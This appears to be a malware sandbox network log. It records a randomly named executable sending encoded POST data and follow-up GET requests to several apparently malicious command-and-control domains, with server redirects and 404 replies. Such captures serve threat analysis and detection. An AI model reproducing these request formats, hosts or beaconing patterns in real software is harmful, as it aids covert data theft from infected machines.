Oct 19, 2024 12:59:02.923027039 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:02 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 254
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wfm=G6oTo8vx&2BWDG=PtkUewcqXhXGGI7VMrya73N+Qsazq4YwnB9JayH4Wx/cNc5hllniCA+e9SSCe0uJ5GQ5bYdUyDtJB9Y3dlvxJqubD8cdfqbVHrRmeQrxGVujTIKJZNnfFV0="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 50040 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:59:07.984530926 CEST | 857 | OUT | POST /puvv/ HTTP/1.1
                                                                                                                            Host: www.bidiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.bidiez.com
                                                                                                                            Referer: http://www.bidiez.com/puvv/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=e9jnDxBzpV63E41oNCA4JW0t8fTqOAbOF1CCtGUVJOSqYdlfD04RwKCMqAtlzYZ9mh1YxvzDvuCi2n7ofnlV/uN3MShoe0dPHJ63/JRl7f0oVaX+cDloCbRx2/0MYaJ1T7nBECaJ3lWYSqEKOIbNthrH5F99TROib0sBQS5ybxSX/7/4KPMmdouJHwe6DDf90Q==


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                             34 | 192.168.2.4 | 50041 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                                             Oct 19, 2024 12:59:10.535514116 CEST | 877 | OUT | POST /puvv/ HTTP/1.1
                                                                                                                            Host: www.bidiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.bidiez.com
                                                                                                                            Referer: http://www.bidiez.com/puvv/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=e9jnDxBzpV63FYFoMhY4P20s2/TqEgbKF1+CtD1OK82qZ/9fC14R9qCMyQtg3YZ2mm9mxuPDvqqi2nLoeUNW++N1HyhqRUdPHJ63/JE47fcoVqH+TClpeLR2x/0McaJ5T7nvEDGz3n+YSocKO8PS0RqtkV89CDzobEJ9TREdYC+M+9uib+txPoK6a3XOOAi0vZhu+tHJs4YYoNZrRwQ+fpM=


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                             35 | 192.168.2.4 | 50042 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                                             Oct 19, 2024 12:59:13.087300062 CEST | 10959 | OUT | POST /puvv/ HTTP/1.1
                                                                                                                            Host: www.bidiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.bidiez.com
                                                                                                                            Referer: http://www.bidiez.com/puvv/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                             Data Ascii: 2BWDG= [TRUNCATED]


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                             36 | 192.168.2.4 | 50043 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                                             Oct 19, 2024 12:59:15.625636101 CEST | 593 | OUT | GET /puvv/?2BWDG=T/LHAG9D/DKJAY4cGgIDBFFZtM7APAzZIDfepGdmMtSSWfF7Llgex9+86BRulJJgtl8XrMP4vqS7406AXnp/ur5mLgtmNl9eCp3snLA44a4sQebgdSQlBLY=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.bidiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                             Oct 19, 2024 12:59:16.263792038 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:16 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 254
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2BWDG=T/LHAG9D/DKJAY4cGgIDBFFZtM7APAzZIDfepGdmMtSSWfF7Llgex9+86BRulJJgtl8XrMP4vqS7406AXnp/ur5mLgtmNl9eCp3snLA44a4sQebgdSQlBLY=&wfm=G6oTo8vx"}</script></head></html>


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                             37 | 192.168.2.4 | 50044 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                                             Oct 19, 2024 12:59:21.323249102 CEST | 866 | OUT | POST /tlpb/ HTTP/1.1
                                                                                                                            Host: www.deltastem.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.deltastem.net
                                                                                                                            Referer: http://www.deltastem.net/tlpb/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=DbPISYv4wPlOzDE+abaZIbHvxbPW2ylUwF72Tv8YEh7yFZ6kfbUGVs/g6ZTZMtJzQGoX3j+xjYIrViRbg4oOvLo5o7Pd3qjD2rDvpGtZSSthYHDPF7ygpn+WQdEQuVqRBAWFiWqiiyhLZH8a3Hx52aazp2Bj4cGsCwSci7VfuQFvUobsQm7KbZTSK6TS100hfw==


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                             38 | 192.168.2.4 | 50045 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                                             Oct 19, 2024 12:59:23.867810011 CEST | 886 | OUT | POST /tlpb/ HTTP/1.1
                                                                                                                            Host: www.deltastem.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.deltastem.net
                                                                                                                            Referer: http://www.deltastem.net/tlpb/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=DbPISYv4wPlO1j0+JMOZO7Hg97PW/SlQwFn2TqQuE0jyE8GkOqUGQs/gx5TYCNJ6QG0h3h6xjYMrVgJbgPENubpfzLPb5KjD2rDvpG5jSS1hY0LPEZKjvX+XENEQkFqVBAWniX2bi2RLZGMa52x6/aaxt2AD4ujGbAKXrINrgwwPcOK2BXadJZ3hX9am43JoE/NqfeaagXmDi8bIgEb39lk=


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                             39 | 192.168.2.4 | 50046 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                                             Oct 19, 2024 12:59:26.439686060 CEST | 10968 | OUT | POST /tlpb/ HTTP/1.1
                                                                                                                            Host: www.deltastem.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.deltastem.net
                                                                                                                            Referer: http://www.deltastem.net/tlpb/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                             Data Ascii: 2BWDG= [TRUNCATED]


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                             40 | 192.168.2.4 | 50047 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                                             Oct 19, 2024 12:59:29.056119919 CEST | 596 | OUT | GET /tlpb/?2BWDG=OZnoRuv0v/1Z/CA6HO2FEIDEprX/+1BF8Drjd+I5ZVz3FMGcbqM7cMP28c7FY+8MR3FV1C6ikaATRgc5pZIEy8I+zLLxgcbQl7nSgVZzV1ZQYFDgHJWD22o=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.deltastem.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                             Oct 19, 2024 12:59:29.646204948 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:29 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 254
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2BWDG=OZnoRuv0v/1Z/CA6HO2FEIDEprX/+1BF8Drjd+I5ZVz3FMGcbqM7cMP28c7FY+8MR3FV1C6ikaATRgc5pZIEy8I+zLLxgcbQl7nSgVZzV1ZQYFDgHJWD22o=&wfm=G6oTo8vx"}</script></head></html>


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                             41 | 192.168.2.4 | 50048 | 129.226.56.200 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                                             Oct 19, 2024 12:59:35.653805971 CEST | 863 | OUT | POST /170y/ HTTP/1.1
                                                                                                                            Host: www.dxfwrc2h.sbs
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.dxfwrc2h.sbs
                                                                                                                            Referer: http://www.dxfwrc2h.sbs/170y/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=F1AY6TOgQcqfpr1a1xrEcYpXMWbaksrR86pMDjHHTzUL0MxlPmugeRZF2tT/wp3YqHFtXpQ1W/0iS2ky7yjCJbIRJKwULIfNlIWJl3FxVl3NIgvzgEFEZBd6Cwg44YExjCDvb3lei77Ge0krLYKxw0v2IW3t4mDFKJXZqXF/dRQ1Jr8Y/MCtd9GF39iCgp5z8g==
Oct 19, 2024 12:59:36.625159025 CEST | 708 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: Tengine
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:36 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 548
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 50049 | 129.226.56.200 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:59:38.195497990 CEST | 883 | OUT | POST /170y/ HTTP/1.1
                                                                                                                            Host: www.dxfwrc2h.sbs
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.dxfwrc2h.sbs
                                                                                                                            Referer: http://www.dxfwrc2h.sbs/170y/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=F1AY6TOgQcqfrIda52fEVYpQQGbauMrN861MDizXSAwL1tBleSagdRZFxdT+9J3lqHJLXrE1W/giSzYy6B7FLLIPPKwWFofNlIWJl05PVlvNIRfzjhpHaBd5Sgg48YE9jCD3byBgi5zGe1UrLJKy60uzF2371H62P7zQjG0bAVcRFNtCu9j6P9i2q6r2tqE6nnQYNCLEGkiYGeRrzW+7G78=
Oct 19, 2024 12:59:39.134040117 CEST | 708 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: Tengine
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:38 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 548
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 50050 | 129.226.56.200 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:59:41.161271095 CEST | 10965 | OUT | POST /170y/ HTTP/1.1
                                                                                                                            Host: www.dxfwrc2h.sbs
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.dxfwrc2h.sbs
                                                                                                                            Referer: http://www.dxfwrc2h.sbs/170y/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
Data Ascii: 2BWDG= [TRUNCATED]
Oct 19, 2024 12:59:42.105974913 CEST | 708 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: Tengine
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:41 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 548
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 50051 | 129.226.56.200 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:59:43.702356100 CEST | 595 | OUT | GET /170y/?2BWDG=I3o45m+IM5HdnoUn9E/KeuZYRn+MuP/J4/ZPHUzUWglV3+hragapbTpjy/fUorb6vXgAJIJIb8kfShtL1xPmTfA4E9gYWbnzpoLcgkFnKSz5IRKj2k5YNRo=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.dxfwrc2h.sbs
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
Oct 19, 2024 12:59:44.676678896 CEST | 708 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: Tengine
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:44 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 548
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 50052 | 84.32.84.32 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:59:50.297528982 CEST | 863 | OUT | POST /314m/ HTTP/1.1
                                                                                                                            Host: www.rsantos.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.rsantos.shop
                                                                                                                            Referer: http://www.rsantos.shop/314m/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=ylsIEqMeXWae5aiYCiR2JImLQ1o0FAbpC6iuQ3CYn18HjSOPAPPT22avh+yxPLokH1cEB/jSMcNQbjYd7/LrFtPdJiEVdC6hHwQ1y14XlDS/sQ0W+Pb712RuctsuF46ILHD2r2OyKGwa5GDg4FubFGF+p3MRoL5gdyRvqNkoIIsMRlljUAYoFPp4TOgF1n+7bw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 50053 | 84.32.84.32 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:59:52.883503914 CEST | 883 | OUT | POST /314m/ HTTP/1.1
                                                                                                                            Host: www.rsantos.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.rsantos.shop
                                                                                                                            Referer: http://www.rsantos.shop/314m/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=ylsIEqMeXWae/OmYOh52dYmIJFo0fwbtC6muQ2GInAkHi3iPHLbT32avpey0ArpJH1YMB+vSMcZQbiod7o/sE9PbdSETTi6hHwQ1y0dAlC6/shEW/rP4/WRpbtsuSo7DLHCVr3jXKFIa5Gzg7QScWmF40nMCjIRrTH4XrMY1WLcTQj05Fx5/XPNLOJpx4kDyA4vhSyIT+FjvXcRZZyH6LZ0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 50054 | 84.32.84.32 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:59:55.429565907 CEST | 10965 | OUT | POST /314m/ HTTP/1.1
                                                                                                                            Host: www.rsantos.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.rsantos.shop
                                                                                                                            Referer: http://www.rsantos.shop/314m/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
Data Ascii: 2BWDG= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 50055 | 84.32.84.32 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:59:57.979615927 CEST | 595 | OUT | GET /314m/?wfm=G6oTo8vx&2BWDG=/nEoHfYmGWKhq8vFGRFNK+CuQmseJQPwD7+4RgKMnEs9pXqONJL1vWb6ndeJft1RBApaVMH9KNEUZDtJl+3Iba72QDspFCGFBwch41sSsFCGmhRE7+Dvvlc= HTTP/1.1
                                                                                                                            Host: www.rsantos.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
Oct 19, 2024 12:59:58.617046118 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: hcdn
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:58 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 10072
